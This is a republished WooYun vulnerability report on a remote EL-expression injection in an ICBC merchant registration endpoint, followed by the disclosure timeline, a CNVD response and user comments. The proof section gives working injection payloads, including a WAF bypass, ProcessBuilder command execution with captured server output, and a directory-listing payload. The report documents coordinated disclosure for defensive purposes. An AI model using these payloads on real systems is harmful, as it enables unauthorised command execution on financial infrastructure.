工商银行某系统存在远程EL表达式注入漏洞(命令执行)

admin 2017年4月30日00:40:25评论907 views字数 236阅读0分47秒阅读模式
摘要

2016-04-14: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

漏洞概要 关注数(280) 关注此漏洞

缺陷编号: WooYun-2016-196160

漏洞标题: 工商银行某系统存在远程EL表达式注入漏洞(命令执行) 工商银行某系统存在远程EL表达式注入漏洞(命令执行)

相关厂商: 工商银行

漏洞作者: 猪猪侠工商银行某系统存在远程EL表达式注入漏洞(命令执行)

提交时间: 2016-04-14 14:20

公开时间: 2016-06-02 15:30

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程代码执行

74人收藏


漏洞详情

披露状态:

2016-04-14: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

这个漏洞只影响有钱人,乌云欠我一个闪电

详细说明:

#1 漏洞描述

EL表达式语法允许开发人员开发自定义函数,以调用Java类的方法

#2 影响服务器

http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml

#3 Paylod

code 区域
groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1

工商银行某系统存在远程EL表达式注入漏洞(命令执行)

漏洞证明:

#4 绕过WAF

code 区域
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml
companyName=999&groupName=&papersType=${"a9999abbb".toString/u0028/u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1

工商银行某系统存在远程EL表达式注入漏洞(命令执行)

#5 回显命令执行

code 区域
groupName=1&papersType=${%23a%3d/u0028new%20java.lang.ProcessBuilder/u0028new%20java.lang.String[]{/u0027/sbin/ifconfig/u0027,/u0027-a/u0027}/u0029/u0029.start/u0028/u0029,%23b%3d%23a.getInputStream/u0028/u0029,%23c%3dnew%**.**.**.**.InputStreamReader/u0028%23b/u0029,%23d%3dnew%**.**.**.**.BufferedReader/u0028%23c/u0029,%23e%3dnew%20char[50000],%23d.read/u0028%23e/u0029,%23ringzero%3d%23context.get/u0028/u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse/u0027/u0029,%23ringzero.getWriter/u0028/u0029.println/u0028%23e/u0029,%23ringzero.getWriter/u0028/u0029.flush/u0028/u0029,%23ringzero.getWriter/u0028/u0029.close/u0028/u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1
code 区域
${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}
code 区域
eth5      Link encap:Ethernet  HWaddr 00:50:56:97:7A:74  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0
TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:735168104896 (701110.9 Mb) TX bytes:11750604019014 (11206249.2 Mb)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0
TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:25387430681 (24211.3 Mb) TX bytes:25387430681 (24211.3 Mb)

工商银行某系统存在远程EL表达式注入漏洞(命令执行)

#6 列目录

code 区域
groupName=1&papersType=${new **.**.**.**.File(/u0027//u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1

修复方案:

# 表达式不允许来自客户端调用

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-18 15:23

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

0%

0%

0%

0%


评价

  1. 2016-04-14 14:33 | 牛 小 帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

    1

    黑阔

  2. 2016-04-14 14:34 | cwkiller ( 普通白帽子 | Rank:174 漏洞数:39 | 闭关修炼)

    2

    我再也不欠你什么了

  3. 2016-04-14 14:35 | 疯狗 工商银行某系统存在远程EL表达式注入漏洞(命令执行) ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    3

    这个漏洞只影响有钱人,大富大贵洞

  4. 2016-04-14 14:36 | PiaCa ( 普通白帽子 | Rank:137 漏洞数:11 | 简单点! 啪......嚓~~)

    1

    富贵洞

  5. 2016-04-14 14:39 | zsmj ( 普通白帽子 | Rank:243 漏洞数:34 | 蛛丝马迹!)

    1

    吓得我抓紧看看卡里余额有没有少

  6. 2016-04-14 14:43 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    2

    -

  7. 2016-04-14 14:44 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    1

    大富大贵洞 吓得我差点把卡里俩毛钱取出来

  8. 2016-04-14 14:45 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    1

    !!!!

  9. 2016-04-14 14:58 | 浩天 工商银行某系统存在远程EL表达式注入漏洞(命令执行) ( 普通白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    1

    好姿势

  10. 2016-04-14 15:00 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    1

    我表示关注

  11. 2016-04-14 15:04 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    哈喇子

  12. 2016-04-14 15:05 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的,只有不想做的)

    1

    唉 我是说我卡里怎么扫了18块 原来如此啊

  13. 2016-04-14 15:06 | SREAUDIO ( 实习白帽子 | Rank:42 漏洞数:13 | 努力学习,磨练技术)

    1

    @浩天 我有一个漏洞5天了还没审,求教

  14. 2016-04-14 15:11 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    1

    吓得我赶紧看看卡里余额有没有多!

  15. 2016-04-14 15:11 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    1

    就这 JC 还不查水表? 那就奇怪了。

  16. 2016-04-14 15:14 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    1

    嚇得我都不管是用工商銀行卡了

  17. 2016-04-14 15:18 | Martial ( 普通白帽子 | Rank:2639 漏洞数:370 | 竟然还有人冒充我,醉了,骗子QQ445697541...)

    2

    这个漏洞只影响有钱人,大家可以放心了 - -~!

  18. 2016-04-14 15:35 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    2

    我收到我的银行卡消费信息,吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在,真是吓死人了!

  19. 2016-04-14 15:51 | xxsec ( 路人 | Rank:10 漏洞数:8 | kali,metasploit)

    1

    吓死我了,赶紧狂奔到银行查了下卡里的2块3毛8···

  20. 2016-04-14 16:03 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)

    1

    你裤腿侧面破了吧

  21. 2016-04-14 16:17 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    1

    @苏安泽 你自行车呢?

  22. 2016-04-14 16:22 | by黑桃 ( 实习白帽子 | Rank:95 漏洞数:37 | 昨晚和老公大吵了一架,今天早上来大夷妈了...)

    1

    把楼上的人全部带走

  23. 2016-04-14 16:33 | 兔八哥 ( 实习白帽子 | Rank:41 漏洞数:6 | 我心飞 翔)

    1

    我卡里也有好几块啊,在村里也算是有钱人了,要不要报警,急,在线等

  24. 2016-04-14 16:47 | 乐乐 ( 普通白帽子 | Rank:251 漏洞数:73 | 一名信息安全员)

    1

    也来围观一下

  25. 2016-04-14 16:57 | xiya ( 路人 | Rank:5 漏洞数:1 )

    1

    要不要报警,急,在线等

  26. 2016-04-14 17:07 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    1

    吓得我赶紧看看卡里余额有没有多!

  27. 2016-04-14 17:37 | 睾大强 ( 路人 | Rank:6 漏洞数:3 | there are five stages,denial,then anger,...)

    1

    什么时候能影响我啊 求备影响

  28. 2016-04-14 17:43 | socket ( 实习白帽子 | Rank:55 漏洞数:21 | )

    1

    666搞银行。。

  29. 2016-04-14 19:39 | 白骨夫人 ( 普通白帽子 | Rank:248 漏洞数:56 | 白骨夫人,白只做白的,骨就是骨气,夫人就...)

    1

    牛逼啊 ,,, 混个熟脸

  30. 2016-04-14 19:49 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    1

    好牛逼

  31. 2016-04-14 20:00 | 听听鸟叫 ( 路人 | Rank:14 漏洞数:4 | 看看天空)

    1

    沾点牛气

  32. 2016-04-14 22:03 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    @白骨夫人

  33. 2016-04-14 22:28 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    1

    @路人毛 卖了

  34. 2016-04-19 07:58 | J3c0sk ( 路人 | Rank:4 漏洞数:2 | *)

    0

    等死吧,劳资已经报警了

  35. 2016-06-02 16:17 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    0

    滴血的漏洞??66

  36. 2016-06-02 16:34 | Jovi ( 路人 | Rank:4 漏洞数:1 )

    0

    没闪电只有滴血

  37. 2016-06-02 16:44 | JiuShao ( 普通白帽子 | Rank:495 漏洞数:109 | ╮(╯▽╰)╭锄禾日当午)

    0

    第一滴血

  38. 2016-06-02 17:11 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    0

    @随风的风 前几天就有了,又不是今天出的

  39. 2016-06-02 17:22 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    0

    后面的那个红色点代表什么意思啊?

  40. 2016-06-02 21:24 | Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)

    0

    吓死我了,赶紧狂奔到银行查了下卡里的2块3毛8···

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin